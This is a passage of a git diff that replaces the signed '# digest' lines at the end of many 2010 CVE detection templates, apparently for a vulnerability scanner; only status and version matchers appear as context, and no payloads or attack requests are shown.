4b0a00483046022100eadc940751fa801f31bd9431865a1348c1f01b754fdecf114d6900e0bc46966a022100a8eef2e4dd1939224c45d659610ed1d33481c91c5055014673be55c6c96f3e44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1476.yaml b/http/cves/2010/CVE-2010-1476.yaml index 931cc3a490..dec4bc95c4 100644 --- a/http/cves/2010/CVE-2010-1476.yaml +++ b/http/cves/2010/CVE-2010-1476.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e223bbab6d530ae6a44d3bd78a373853c5148f44c8fc760b86463968a99c39260220014aad890aabb37a243d84a97dc63c543133a8974a8c00e2b56a558e85a93be3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220531dcb18e8f2b71dbb39f860cc4850ffd43574870cced6d1c14fa79a91dcc92b022100b113da3738595c7563a2e04bdecc3d3e47efe77caef58b89fd6e5f8a590a5fcf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1494.yaml b/http/cves/2010/CVE-2010-1494.yaml index 879955f14d..78e7aee8ea 100644 --- a/http/cves/2010/CVE-2010-1494.yaml +++ b/http/cves/2010/CVE-2010-1494.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022078af0a2572ae5f8b2c1663f51eada15aaf88e88ddd86c86885239309dfc1cad3022004c0a80a0505a5b96aa016ae9b7c502555783290a05b5589d8a9677dcabefefe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220546ac5f56c9b94a44e941e632a9b307d80f472cc78e438065d385bcc5fec50c60221009b72878dc057fb94cdea625001bce4ecd0f230639b3f0a01e4fb43ac3892436e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1532.yaml b/http/cves/2010/CVE-2010-1532.yaml index d657b8093c..c70c75a4af 100644 --- a/http/cves/2010/CVE-2010-1532.yaml +++ b/http/cves/2010/CVE-2010-1532.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210093ee4b75fd03b95c7cf1b62869f48b19b4cd257e9b6ee4e7a9ddd9ebdeba739f022100d1cd3032f304650a027ad4a1645ed98ff12691f89b7e9116d244291df5398606:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205caacbaf2ced111a394d679ebcbfb86ab6f023380a04a9d6c7697916e3b76e43022056232dd3d5468b234d0d1cdaf03f2e753d6a0eadf807d281785b2f8c65dd7b2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1533.yaml b/http/cves/2010/CVE-2010-1533.yaml index 1f7465f851..87d05d92fd 100644 --- a/http/cves/2010/CVE-2010-1533.yaml +++ b/http/cves/2010/CVE-2010-1533.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100eedf4edbfe23d403bdd5c5489b678f09c60e2a4eb686e7fa5f90c08137b92d54022100e22396a012f39f1ae9f4950b22031a7521a366a61411f98a4f3323782f5e2eaa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207de073fa377307af9bd3d0b3406ad3f9681feb1ca46031ccfcb6ed7561fc4a940220077be57fecc58376b676559e9e3dae1c8c8a0868e3d9b9654d949e981ad93d8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1534.yaml b/http/cves/2010/CVE-2010-1534.yaml index e06e190f6d..497cc14171 100644 --- a/http/cves/2010/CVE-2010-1534.yaml +++ b/http/cves/2010/CVE-2010-1534.yaml @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022040ad70967db9eabb2f9a61956bb22a2cb03a60da3fd695753b8fc46da9eb48e3022071b38622330ce4f8a704bb116b35a8279a76512268663ad681d5360a49288372:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220627c0439bed5f9c857145fb35f1a5e4152607d796e171b2b35aab09be7387341022066442ae0a3a5ca34a7cc9658c5644f13efdf60281a3652b3a95f493277194bcd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1535.yaml b/http/cves/2010/CVE-2010-1535.yaml index 6c457012db..665b8757a7 100644 --- a/http/cves/2010/CVE-2010-1535.yaml +++ b/http/cves/2010/CVE-2010-1535.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210081ae121f8d5b40c99be54953f4642587c68241fe48f2df08217c1a01ea61731502201393c0f1a4c9d6e00e2fd41022df88c7a15e3bc678a5eaf99634e69b735ab26a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022064230d9af661b0cb073113c4d0f724c89a82b08fcab9006563ef55a52a4825a40221009d1b17512cd61af4cc7e16ec02bb3451760585297295375e21604a3c784b1984:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1602.yaml b/http/cves/2010/CVE-2010-1602.yaml index 70e02b87f1..ccbf3c44ed 100644 --- a/http/cves/2010/CVE-2010-1602.yaml +++ b/http/cves/2010/CVE-2010-1602.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205e094a51db98044850affaa030835374e20660764cfd65e9a367c5012aa6741c02207e065ab9927fef891678a4c7c425734e4e0c1c040f73d6e9a60c9ab7b3b9bfd2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a0eeca7aba4d9618dbe8ca061a7589c36f2b6768e904f2b92e36691632e3cc0a022100bcb42d40cbb3d6a870475dd714f9ca84ad666d622dac96e9707a9253f85c0183:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1607.yaml b/http/cves/2010/CVE-2010-1607.yaml index 35daa2bd86..0aa7d29812 100644 --- a/http/cves/2010/CVE-2010-1607.yaml +++ b/http/cves/2010/CVE-2010-1607.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220671ba5beac4877f63605810ae5ba53e80578909ca33547f5bbc443a22f1920b2022100c4437f0060e149ac837e691a2ee6a12613e7a6ebfe5da8f49b5b52643d78af5c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206a5567b36fff3d03faf770d2c865bf1b403a7b30e0032dfcb49e1553a84bbde4022100f26f6975831ceea1e81e0270b4d70b1ac8619c87910f88580b2df1a75323344c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1653.yaml b/http/cves/2010/CVE-2010-1653.yaml index 9d241f2807..e7709b2dcc 100644 --- a/http/cves/2010/CVE-2010-1653.yaml +++ b/http/cves/2010/CVE-2010-1653.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204ad756a9e16380e027261fee411718753cfd8cbd153d923afa480c57a77e943d022100be3f9d60f33c780dec7263782e438f10d46f59b0c77a82743874dd0e9c03f65f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202e7d67f69fd77bb7216c22fe8676faffb37290acbe3fd550615f33535360ee7102205db0d9e232af3096fb6bc570705058627696924b3e88bd65649940969e1ff061:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1657.yaml b/http/cves/2010/CVE-2010-1657.yaml index 8aef850eec..8a50c2496a 100644 --- a/http/cves/2010/CVE-2010-1657.yaml +++ b/http/cves/2010/CVE-2010-1657.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100bcb3752f3f8e24379ea159e6831ebe01f2da83a0d58232453372c79b86e08221022100ed629a46f18c172871595fe7120c9aeb0f2441da744b940c59461cde7c96719a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f7d70491dc51a14478a027cf92cee4704418b3b61a36897ba1a3f8ea33bea0df02207acc9a7bd2d035f2e228ed04cf180acadef6a88c222bf92e62cb4b1672822672:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1659.yaml b/http/cves/2010/CVE-2010-1659.yaml index 72dc18f295..04aec7c37b 100644 --- a/http/cves/2010/CVE-2010-1659.yaml +++ b/http/cves/2010/CVE-2010-1659.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022044961916a557a8da30cac3ced56cc0b76c6ad56a135ccdeedda4e81e2bfea49e022027e20655fa3d414923eda4d6272299f0f4dd2cef72c8f74d3ba8b462a10c390a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b0d75d2392e79829bfdf92b9806aaffe08721016c29f5e8f84e2cdfbfd700d12022100cdcc663f4843b1ee272e6c689afc5814092e36c1735e11ef0472b89bb472b7c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1715.yaml b/http/cves/2010/CVE-2010-1715.yaml index 9288a4e941..f4d1851069 100644 --- a/http/cves/2010/CVE-2010-1715.yaml +++ b/http/cves/2010/CVE-2010-1715.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c47a4bdd67634653ce4da4af40c81205ffdcc542bbe4c92693d10063b0f15a6a02202182f5b7abe3de71edc4955d26840eeaaa624feab87fc896bee09c8bb5f97b8f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a9b34fe0a7da0582ef2dc9ed994e6f7c8805d5e3a7696068a29d89923a913df8022100869ef62055b34cb46a7e175e4df24c22713574e5763d263f77e84f873f33c6d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1718.yaml b/http/cves/2010/CVE-2010-1718.yaml index 34fe12b934..82e72f9219 100644 --- a/http/cves/2010/CVE-2010-1718.yaml +++ b/http/cves/2010/CVE-2010-1718.yaml @@ -39,4 +39,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ecd7446fef1ce54e4f4248ba012aa11ea08e53dd3f5a36fa12d01852d0bf6cd5022100d86f62c4cc116ef4a60241471d37ff8b72ad493ced0d7e6002f1c5ac3db35856:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201dc083bb694abd37e88974641d425a4eaf4eff49cd1a761d702b381aaf4996200220164ea38314a22108dcab83b2524a8f02609d718d0f5541633d753c2dc66ea34c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1723.yaml b/http/cves/2010/CVE-2010-1723.yaml index 9970e98d4a..dd684fe50d 100644 --- a/http/cves/2010/CVE-2010-1723.yaml +++ b/http/cves/2010/CVE-2010-1723.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402201f2f6d4b03887f91f05f31e90985ffe041fc19b52146f7a927b36a949b69b27502200af68b38786ac9d14967173b092a4efe378dbf324842eda5736934450c559c42:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022052aabf3c818f63799605eb33167aa840fee9339e6f7a84c0684ed30ea8d352e9022100a66fb820f305c1ebef927eecccd45ce4ad7538e3550cbb860a0e6529cbc86ae5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1870.yaml b/http/cves/2010/CVE-2010-1870.yaml index 79558d6a05..6395aa9c92 100644 --- a/http/cves/2010/CVE-2010-1870.yaml +++ b/http/cves/2010/CVE-2010-1870.yaml @@ -45,4 +45,4 @@ http: - 'LISTSERV Maestro\s+[5678]' - 'Administration Hub 9\.0-[123456780]' - 'Administration Hub [5678]' -# digest: 4a0a00473045022009c28af24d49d9f2b2cd719eef0eab59eb17456cc5d44bc1d3fc2767d24ef9c4022100be33c84b0809ba11233918e74323b720e874f8870e0a84637e4a6b55f773050f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e541bad52cababb6cd2cd61c1b26ab8feaae117ccf9c87d10f7c588ca5d3156202204c61984cd595f1fb51216ffaccaa7ca4e2cca292526bf62b42ccb8aaf95821f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1952.yaml b/http/cves/2010/CVE-2010-1952.yaml index 07b578d433..11d0582f50 100644 --- a/http/cves/2010/CVE-2010-1952.yaml +++ b/http/cves/2010/CVE-2010-1952.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022061129aea74772e6b2b1371d4e9ba2aa09c9f71d86f09cf33e41a27be90867130022100d2644c5fc639b09a774b82d50f93ec5ca8f39406463ee51c885db6833b1deb61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e07e1103f68db3c4d774c16b7c2b4fc90547e70e1a8a8a752e6308c0465fc15302202e39e604eb2d895d4825c9de4334dd75c03176b3cdf972c69e7e55e9487083ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1953.yaml b/http/cves/2010/CVE-2010-1953.yaml index b6d585837a..3bee6f3579 100644 --- a/http/cves/2010/CVE-2010-1953.yaml +++ b/http/cves/2010/CVE-2010-1953.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022038e7b2689d93babc89559d2862b8bc5b183cad389c6e2fed0700cefd3cf3dfdd022100fd31164f65dbbcb7da90ab8bfdc92b82e66296933e903952cbca8a4182cc9e4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d737f13ca5fc25fe5a00569e47bc39dc8c74c5eb793170039da9d8ddd6470d2f022022d723da6b42ee3de6826045e52db5c95f4d96e596eddfbb0eb73dc0b4bca78b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1955.yaml b/http/cves/2010/CVE-2010-1955.yaml index 69eff5b4e1..5c7b96d25e 100644 --- a/http/cves/2010/CVE-2010-1955.yaml +++ b/http/cves/2010/CVE-2010-1955.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b23a4aac6fedfb37e15cc43e7f51bf59ba413a099ae58090b05ee9be66d60314022100cfad298dd85b0b1b0cb1046b79e4e8822f005cb18b4081f3c898c3397cdbcc31:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008a8acf3d912e951184f07a48b87c8045691518679ee88020752b9e4dd173a092022100bd260f2ca3cb5ae17b9ccf3bba743bb2963a9fcc9f340e92c95d75d54ae10ea2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1956.yaml b/http/cves/2010/CVE-2010-1956.yaml index f02fa9f751..bdee8941c7 100644 --- a/http/cves/2010/CVE-2010-1956.yaml +++ b/http/cves/2010/CVE-2010-1956.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206e67b1c6317d9843ab60b722ade0f0942e4913d7c3f5630b1c8d19483f638f0c0221009162ad1fcb96f2a504a7f16e9805bc854997ba06eeb3c61adedbf42d4225287e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100858eabd63b6f72843f947e5246274143c6b956b7879d26cbf87d64780ad211df022100c785ac8b95b0a5a99bc41f1ffe795c59c91ba0f621307ff96ab25e35bb5096a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1957.yaml b/http/cves/2010/CVE-2010-1957.yaml index 5e3c5d603c..fc61a3a298 100644 --- a/http/cves/2010/CVE-2010-1957.yaml +++ b/http/cves/2010/CVE-2010-1957.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d140e4c1bf958b49625695ac09664cf37de408e74bc9902c319f6646d10d4de2022100e65a364df1072baccbf87a339592e9ecdd95de20e8dd4b705484ea97dafb2f70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220257730d7812d60cf61ac7279df9ab6ca9bf78181a9c6374ad4d684ad292985da022100d8a43d8b649b8ec95355cb47c4765004ac172a0b0182c730086927f55efcf211:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1977.yaml b/http/cves/2010/CVE-2010-1977.yaml index 5c0a1d9858..b82676c9f8 100644 --- a/http/cves/2010/CVE-2010-1977.yaml +++ b/http/cves/2010/CVE-2010-1977.yaml @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022040f7d241d5e5a884c1963854465cf4831f51f493d326d327351a68621b8ebc3e022100d1c7c3b472c326444bc1b1dd290db71df1dd2cade4f6d02d0d16e10f68ab869b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022050590d4500ed1b763b2bff4f98927178f7e55b44f9a1763caf7f9779d70ffa4c02206df063e8f5d1eebe7a5c628871feeff1823eb31d1b2ba1f3a16634e0e1996343:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1982.yaml b/http/cves/2010/CVE-2010-1982.yaml index e1a7228413..75f553daed 100644 --- a/http/cves/2010/CVE-2010-1982.yaml +++ b/http/cves/2010/CVE-2010-1982.yaml @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009cbc325331da11e25f4fb8d31fd398ac39f41c26c89d567dfd2945557f4275270220384a57dbc3afa51cbb77526db5c0f891e93a2b9153a342bf1de2ccca20f1d5f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b86ef37ec2406ebcd7a572475a092ace4af2e4fda2be5426f1f853176f0c643a02206545a885ccc98c24769c1429820ea52fc4fa78a8ea782584bc48106189b76655:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2036.yaml b/http/cves/2010/CVE-2010-2036.yaml index 0864d1ca53..0bcb0cfb30 100644 --- a/http/cves/2010/CVE-2010-2036.yaml +++ b/http/cves/2010/CVE-2010-2036.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009a903733a1bc7131d855c5d53d11c378d6476b6e613a596b0e25c59edcfd3f92022100d4bc9343ee7c9595b3e44b08de9ce86a8f2d0af8a44d8483514b8ef8f46c7f94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009a3b425ae5ec2bbe01c2787c7d7024e0155bdd84568b28dcfa6e1f464a6bbd9902207b990f2ce66a6360bdb52a7cb037367687c2db90c33ab76fcd01adcbc246470a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2037.yaml b/http/cves/2010/CVE-2010-2037.yaml index d55d60e19c..4b1000b9e2 100644 --- a/http/cves/2010/CVE-2010-2037.yaml +++ b/http/cves/2010/CVE-2010-2037.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022040f5ddf1305890a721c4c1b8140d7c149c2cd3ce17446937f2471e5bebc466d4022100e8a39a2b4cb386864faa905b2dfb3c53d36c6d18fd9fc211a1e6c2d3c1d221b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ba2f173a61884eb77eca05645e474ea0998974ae81cd2f56a2df04bbad2382af022100a52f1e7d8dd7915e7ae5f9d64e3601969a06347ffbbfe263f7c204d53ffc9512:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2050.yaml b/http/cves/2010/CVE-2010-2050.yaml index 1af5b47a92..c533ba23da 100644 --- a/http/cves/2010/CVE-2010-2050.yaml +++ b/http/cves/2010/CVE-2010-2050.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402201528ba80abd9bbc78d30e40e479c27465861d3fa2dd697eb180617ea6e0d81f802202cab5a94649a0d4e9e866b78525516c49a7311601aafcac4bede2efda4bea42a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022072cdaa8c8561d8f802f104a5587be461af0eb4068f8539cb2d673d1e790ae79202205b5ae21b73e9b12635e1776cf8473fec583f1718d6a3bda5b9cc30605ba6b242:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2507.yaml b/http/cves/2010/CVE-2010-2507.yaml index 5cbf79630a..c0ebd7fdb7 100644 --- a/http/cves/2010/CVE-2010-2507.yaml +++ b/http/cves/2010/CVE-2010-2507.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b399f4d9dc6b2c952a2ce9e388b0bc21714fffc806c4a6bb3f768981d57139d802206a1974d7ffcd57ea7f9084e535e8f10afddb089fec9a171050d073c28c510db6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d0fbfb8ffd049aeaf94cf869ef1eb3f0f13b0d27229bb4ed42baa7347337b5e702205a316eeb82abfedeb1294c785875852bd9e3bda4b7d2e32bfaa24f9613e36cb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2680.yaml b/http/cves/2010/CVE-2010-2680.yaml index 5920648367..0206234511 100644 --- a/http/cves/2010/CVE-2010-2680.yaml +++ b/http/cves/2010/CVE-2010-2680.yaml @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022072b515f91c496b58e595115b0d084c1aef00d4c6ee17205d003acb4ab43c571302203b36bc9c01b393ef1b59fd113ab4455849196192ef1900eee38d59ce6a1a60a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044021f5ffc7d61e608cca2478cc4115fe3177e5ed61660e8e13424a4c772b685bb9402210087feaeec186288bbbc891fdd5dc0ba7612f5cfd614be5ffac00907ff4670c362:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2861.yaml b/http/cves/2010/CVE-2010-2861.yaml index a0d36c2f90..45c0984796 100644 --- a/http/cves/2010/CVE-2010-2861.yaml +++ b/http/cves/2010/CVE-2010-2861.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100fb077ddbfc836210d14e4abbde779e3a4801cadf4c5e57973e1675ae37adab3002200a4dff0b074d16f33db367ba0f8a10fb0b418f6e9bf8cdd4f6036ec6db9d649a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206de44a390dc5302759d12fd4001faad67af1b5043d4e5d5a0e99b24cdc4ee516022100e0df13828777ac09065b161cc832acd8bb8369bef83a8222352647a9b20d5b29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2918.yaml b/http/cves/2010/CVE-2010-2918.yaml index a9a05bcd4e..a2ae05ff6f 100644 --- a/http/cves/2010/CVE-2010-2918.yaml +++ b/http/cves/2010/CVE-2010-2918.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210081baa41c250dff048e922e0bd675a0f66fa65d828db6fd1c6cff4362145b014502207a01230528658a21273d20b9529a24d7cf4f605849cae7697de730852ff82435:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200c91419c3b0dbe4afe3e27b165914d136e3f1855987e5f3f1ddeffe3a0eb6669022100d24948753205fe02e60749f58a0130d1567ccb88505cedee18f474e98e61c8bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-3203.yaml b/http/cves/2010/CVE-2010-3203.yaml index 73053d63fa..a3c63c503b 100644 --- a/http/cves/2010/CVE-2010-3203.yaml +++ b/http/cves/2010/CVE-2010-3203.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022030007981511407dd6716097c70d2348b6e7f288e57d05a177e4f9ae0bcf607ef022100aa3436a7609d718ca4639083c1b39f8585519a8c27fd56f228a6af4a2cc3eedf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210086161433d96dea0abbb2460f498faec5e7cc9dc2dac4ae9051982a2ce801d084022016b89bbd96b6df1b01c5144b1077770507e9b836e89044fd5c992e1586fb99df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-4231.yaml b/http/cves/2010/CVE-2010-4231.yaml index b7eeed4fc6..4e77e67d8c 100644 --- a/http/cves/2010/CVE-2010-4231.yaml +++ b/http/cves/2010/CVE-2010-4231.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f3c7c9347f9d8a8e7b83098897aecc1fc6ca5594a43e83505cd43fdd025d6130022100832745cf9064f1897cb80f0caceac6dfa4b448f2bae9f8ca58b1b79ac602e833:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ef798e04d208e6c7944c2de7bd37f63fcc958b0834ef7b0cf0a355a7b866fb15022100c6442d68055cef043c33708877f3fc2667950bb0befd604648e255086d34cac7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-4239.yaml b/http/cves/2010/CVE-2010-4239.yaml index 1c20c4d676..d71ca59e98 100644 --- a/http/cves/2010/CVE-2010-4239.yaml +++ b/http/cves/2010/CVE-2010-4239.yaml @@ -44,4 +44,4 @@ http: - "fonts" - "extensions" condition: and -# digest: 4a0a00473045022100b5b334a2fec00cf5a3aecc1339951bf57de03095d5f4265c23450b3a0c64bb5c02206338a21c9a89350f86820ccc9f08c7d37697834a200669fe085df7763d730318:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d07eddfe6076e3294489122182c54098fc31dc93dfaf0cec95d3140d24aef9800220022764390a506aceb2b9b5bdcc58ada9c586462bf262e0c7d332e98fe5807db4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-4282.yaml b/http/cves/2010/CVE-2010-4282.yaml index c3053847e4..1e44a108c0 100644 --- a/http/cves/2010/CVE-2010-4282.yaml +++ b/http/cves/2010/CVE-2010-4282.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402201b4cbfaddf215e4507727c41a0a0b2a5fe584d66891aa082d5d3e1c647a7bb3402202499125b034828944ede2fdfc1673a00684dbc3abdb877a5ef2baa1824041954:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022028440e6744ab15a712bbddd9e67effbb10196178d3709600c03cdd2e30ade50a02205d3555b2f4623199a271f2977587e15566212b551f0fcf96b961652ce2954fdc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-4977.yaml b/http/cves/2010/CVE-2010-4977.yaml index e93934f80a..d3323122a7 100644 --- a/http/cves/2010/CVE-2010-4977.yaml +++ b/http/cves/2010/CVE-2010-4977.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220090ace41aa0b7a63b491ff1b35ea977e018fd5f7ac4e5bebe586d7c925dab5ef0220211b310be5c582ef6ae23ddaeb61459599b65fb35f6b0ea543195a0f7cdf0a93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200897c3f3a57223199dcdda7ca0d58cb353c96217d295bf61910f84555e8de3dd022100cc179f9666339e72c243c340ca9124694c9b70e3d22b3e0459b0502fb3493085:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-5028.yaml b/http/cves/2010/CVE-2010-5028.yaml index a8375704d5..d0f0ed004e 100644 --- a/http/cves/2010/CVE-2010-5028.yaml +++ b/http/cves/2010/CVE-2010-5028.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100df2b627845f4cfe972f4569690174ffe89b4221f5be16d0a6cb676e29ce2b84202203a4014cdc61ccefa25815adf442d68757eb46d7c0dbe703bf8b7d1739538f26a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210099c8a2ea34e5a300c70e613756972e76528af7ded59250030516965a6a1680710221009bbef457fcbe95c5b31680b9501a35b508099c724f7bb501a8664e2261a4b11c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-5278.yaml b/http/cves/2010/CVE-2010-5278.yaml index 1c896d34d7..8ca4956da3 100644 --- a/http/cves/2010/CVE-2010-5278.yaml +++ b/http/cves/2010/CVE-2010-5278.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008e76f7a4d677f1d7ef95c2948ec7ed1373b61aaf7d8079dee4d600ee0124e6a80220414a9a52b2fc1f231283eec54414a71ccd7fddfadfdfd55c76cddaa64c4d10f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b69cc6b4c42025b13e1bc52d65ea1be1df0981a7add3a28408c4dc8ac8c1bb46022100dc24a3d37f2cc1e1d2ff28b81ed9bd7551744367bd64dfe547edce7f6af21976:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-5286.yaml b/http/cves/2010/CVE-2010-5286.yaml index e0f0e837c0..8fb1e17633 100644 --- a/http/cves/2010/CVE-2010-5286.yaml +++ b/http/cves/2010/CVE-2010-5286.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 